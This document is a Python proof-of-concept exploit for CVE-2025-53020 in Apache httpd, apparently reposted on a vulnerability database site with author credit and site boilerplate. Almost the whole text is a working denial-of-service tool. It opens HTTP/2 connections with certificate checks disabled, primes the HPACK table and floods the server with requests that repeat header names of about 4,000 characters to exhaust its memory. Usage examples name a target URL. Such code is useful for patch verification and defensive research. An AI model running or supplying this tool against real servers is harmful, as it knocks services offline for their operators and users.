1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
import h2.connection
import socket
import time
import tqdm
import argparse
import ssl
from urllib.parse import urlparse
import struct
class H2Attacker:
"""HTTP/2 client for testing memory exhaustion vulnerabilities in Apache httpd."""
def __init__(self, url):
"""Initialize the attacker with target URL.
Args:
url (str): Target URL (e.g., 'https://example.com/path')
"""
parsed_url = urlparse(url)
self.protocol = parsed_url.scheme
self.host = parsed_url.hostname
self.port = parsed_url.port or (443 if self.protocol == 'https' else 80)
self.path = parsed_url.path or '/'
# Validate required components
if not self.host:
raise ValueError(f"Invalid URL: {url}. Host is required.")
# Connection objects
self.socket = None
self.http2_connection = None
# Create pseudo headers from URL components
self.pseudo_headers = self._create_pseudo_headers()
self.default_headers = self.pseudo_headers.copy()
def _create_pseudo_headers(self):
"""Create HTTP/2 pseudo headers from URL components.
Returns:
list: List of pseudo header tuples
"""
return [
(':method', 'GET'),
(':path', self.path),
(':authority', self.host),
(':scheme', self.protocol)
]
def connect(self):
"""Establish HTTP/2 connection to the target server."""
try:
# Create socket connection
self.socket = socket.create_connection((self.host, self.port))
# Set SO_LINGER to 5 seconds to ensure graceful shutdown with FIN
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 5))
# Setup TLS if HTTPS
if self.protocol == 'https':
self._setup_tls()
# Initialize HTTP/2 connection
self.http2_connection = h2.connection.H2Connection()
self.http2_connection.initiate_connection()
self.socket.sendall(self.http2_connection.data_to_send())
# Apply the encoder patch for empty values
self._patch_encoder_for_empty_values()
except Exception as e:
raise ConnectionError(f"Failed to connect to {self.host}:{self.port}: {e}")
def _setup_tls(self):
"""Setup TLS connection with HTTP/2 ALPN."""
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
# Set ALPN to negotiate HTTP/2
context.set_alpn_protocols(['h2'])
# Wrap socket with TLS
self.socket = context.wrap_socket(self.socket, server_hostname=self.host)
# Ensure SSL handshake completes
self.socket.do_handshake()
def _patch_encoder_for_empty_values(self):
"""Patch the h2 encoder to fix empty value indexing bug."""
if not self.http2_connection:
raise RuntimeError("HTTP/2 connection not established")
original_add = self.http2_connection.encoder.add
def patched_add(to_add, sensitive, huffman=False):
name, value = to_add
# Set indexing mode
indexbit = b'\x40' if not sensitive else b'\x10' # INDEX_INCREMENTAL or INDEX_NEVER
# Search for matching header
match = self.http2_connection.encoder.header_table.search(name, value)
if match is None:
# Not in table - use original logic
return original_add(to_add, sensitive, huffman)
# Header is in table
index, found_name, found_value = match
# Fix: Check if found_value is not None (perfect match) instead of truthy
if found_value is not None:
# Perfect match - use indexed encoding
return self.http2_connection.encoder._encode_indexed(index)
else:
# Name-only match - use indexed literal
encoded = self.http2_connection.encoder._encode_indexed_literal(
index, value, indexbit, huffman
)
if not sensitive:
self.http2_connection.encoder.header_table.add(name, value)
return encoded
# Replace the add method
self.http2_connection.encoder.add = patched_add
def set_default_headers(self, additional_headers):
"""Set default headers by combining pseudo headers with additional headers.
Args:
additional_headers (list): List of additional header tuples
"""
self.default_headers = self.pseudo_headers + additional_headers
def send_headers(self, headers, add_pseudo_headers=True):
"""Send HTTP/2 headers for a single request.
Args:
headers (list): List of header tuples
add_pseudo_headers (bool): Whether to prepend pseudo headers
"""
if not self.http2_connection:
raise RuntimeError("HTTP/2 connection not established")
if add_pseudo_headers:
headers = self.pseudo_headers + headers
stream_id = self.http2_connection.get_next_available_stream_id()
self.http2_connection.send_headers(stream_id, headers, end_stream=True)
self.socket.sendall(self.http2_connection.data_to_send())
def send_default_headers(self):
"""Send a request using the default headers."""
if not self.default_headers:
raise ValueError("Default headers are not set")
self.send_headers(self.default_headers, add_pseudo_headers=False)
def add_headers_to_batch(self, headers):
"""Add headers to batch without sending immediately.
Args:
headers (list): List of header tuples
"""
if not self.http2_connection:
raise RuntimeError("HTTP/2 connection not established")
stream_id = self.http2_connection.get_next_available_stream_id()
self.http2_connection.send_headers(stream_id, headers, end_stream=False)
def send_batch(self):
"""Send all batched headers."""
if not self.http2_connection:
raise RuntimeError("HTTP/2 connection not established")
self.socket.sendall(self.http2_connection.data_to_send())
@staticmethod
def create_repeated_header_name_headers(header_name_length=4000, header_reps=1000, char_to_repeat='a'):
"""Create headers with repeated long header names.
Args:
header_name_length (int): Length of the header name
header_reps (int): Number of times to repeat the header
char_to_repeat (str): Character to use for the header name
Returns:
list: List of header tuples with repeated long names
"""
header_name = char_to_repeat * header_name_length
return [(header_name, '')] * header_reps
def run_attack_with_headers(self, headers, requests_per_batch, num_batches, delay_between_batches=0):
"""Run the memory exhaustion attack with specified headers.
Args:
headers (list): Headers to use for the attack
requests_per_batch (int): Number of requests to send per batch
num_batches (int): Number of batches to send
delay_between_batches (float): Delay in seconds between batches
"""
print(f"Starting attack: {num_batches} batches of {requests_per_batch} requests each")
for _ in tqdm.tqdm(range(num_batches), desc="Sending batches"):
for _ in range(requests_per_batch):
self.add_headers_to_batch(headers)
self.send_batch()
if delay_between_batches > 0:
time.sleep(delay_between_batches)
def run_attack_with_default_headers(self, requests_per_batch, num_batches, delay_between_batches=0):
"""Run attack using the default headers.
Args:
requests_per_batch (int): Number of requests to send per batch
num_batches (int): Number of batches to send
delay_between_batches (float): Delay in seconds between batches
"""
self.run_attack_with_headers(
self.default_headers, requests_per_batch, num_batches, delay_between_batches
)
def run_memory_exhaustion_attack(url, header_name_length, header_reps, requests_per_batch,
num_batches, delay_between_batches=0, num_headers_to_repeat=1):
"""Run the memory exhaustion attack against Apache httpd.
Args:
url (str): Target URL
header_name_length (int): Length of repeated header names
header_reps (int): Number of header repetitions per request
requests_per_batch (int): Number of requests per batch
num_batches (int): Number of batches to send
delay_between_batches (float): Delay between batches in seconds
num_headers_to_repeat (int): Number of different header names to create using different characters
"""
print(f"Targeting: {url}")
print(f"Header name length: {header_name_length}")
print(f"Header repetitions: {header_reps}")
print(f"Number of different header names: {num_headers_to_repeat}")
# Initialize attacker
attacker = H2Attacker(url)
attacker.connect()
# First, send an initial request to add the header to HPACK table
print("Sending initial request to populate HPACK table...")
initial_headers = H2Attacker.create_repeated_header_name_headers(
header_name_length=header_name_length, header_reps=1
)
attacker.send_headers(initial_headers)
# Prepare attack headers with different character patterns
print("Preparing attack headers...")
attack_headers = []
for i in range(num_headers_to_repeat):
char = chr(ord('a') + i)
headers = H2Attacker.create_repeated_header_name_headers(
header_name_length=header_name_length,
header_reps=header_reps,
char_to_repeat=char
)
attack_headers.extend(headers)
# Set as default headers and run attack
attacker.set_default_headers(attack_headers)
attacker.run_attack_with_default_headers(
requests_per_batch=requests_per_batch,
num_batches=num_batches,
delay_between_batches=delay_between_batches
)
print("Attack completed. Waiting for server response...")
time.sleep(5)
def main():
parser = argparse.ArgumentParser(
description='''HTTP/2 Memory Exhaustion PoC for Apache httpd
This tool exploits CVE-2025-53020 in Apache httpd by sending HTTP/2 requests with repetitive long header names,
which takes advantage of unnecessary memory duplication for header names.
The attack works by:
1. Creating long header names (--header-name-length) to maximize memory consumption
2. Optionally creating multiple distinct header names (--num-headers-to-repeat) using different characters (a, b, c, etc.)
3. Sending batches of requests (--batches) where:
- Each request contains multiple repetitions of the header names (--header-reps)
- Multiple requests can be sent per batch (--requests-per-batch)
- Optional delays between batches can be configured (--delay)
4. The server allocates memory for each header name occurrence, leading to memory exhaustion
Example usage:
python poc.py --url https://target.com/api/endpoint
python poc.py --url http://localhost:8080/test --header-reps 1000
python poc.py --url https://target.com --num-headers-to-repeat 3
''',
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('--url', required=True,
help='Target URL (e.g., https://example.com/path)')
parser.add_argument('--header-name-length', type=int, default=4064,
help='Length of header name (default: 4064)')
parser.add_argument('--header-reps', type=int, default=2063,
help='Number of header repetitions per request (default: 2063)')
parser.add_argument('--requests-per-batch', type=int, default=1,
help='Number of requests per batch (default: 1)')
parser.add_argument('--batches', type=int, default=100,
help='Number of batches (default: 100)')
parser.add_argument('--delay', type=float, default=0,
help='Delay between batches in seconds (default: 0)')
parser.add_argument('--num-headers-to-repeat', type=int, default=1,
help='Number of different header names to create (default: 1)')
args = parser.parse_args()
# If using multiple header names, force requests per batch to 1
if args.num_headers_to_repeat != 1:
if args.requests_per_batch != 1:
print(f"Warning: When using multiple header names > 1, requests per batch is recommended to be 1")
if args.header_name_length > 4000:
print(f"ERROR: When using multiple header names > 1, header name length should be less than 4000")
return 1
if args.header_name_length > 4064:
print(f"ERROR: Header name length should be less than 4064")
return 1
if args.header_reps > 2063:
print(f"Warning: Header reps should be less than 2063")
try:
run_memory_exhaustion_attack(
url=args.url,
header_name_length=args.header_name_length,
header_reps=args.header_reps,
requests_per_batch=args.requests_per_batch,
num_batches=args.batches,
delay_between_batches=args.delay,
num_headers_to_repeat=args.num_headers_to_repeat
)
except Exception as e:
print(f"Error: {e}")
return 1
return 0
if __name__ == "__main__":
exit(main())
Exploit author: Gal Bar Nahum
Source: https://github.com/galbarnahum/CVE-2025-53020-PoC
AVET INS is an owner of VULNDBASE brand and website. This product uses data from the NVD API but is not endorsed or certified by the NVD. See NVD page for more information. CVE is a registered trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE site. CWE is a registered trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE page. KEV (Known Exploited Vulnerabilities) is a catalog maintained by CISA. EUVD is the official EU repository for timely, curated cybersecurity vulnerability intelligence and remediation guidance run by ENISA. DORA (Digital Operational Resilience Act) is and EU directive.
Copyright AVET INS 1997 - 2026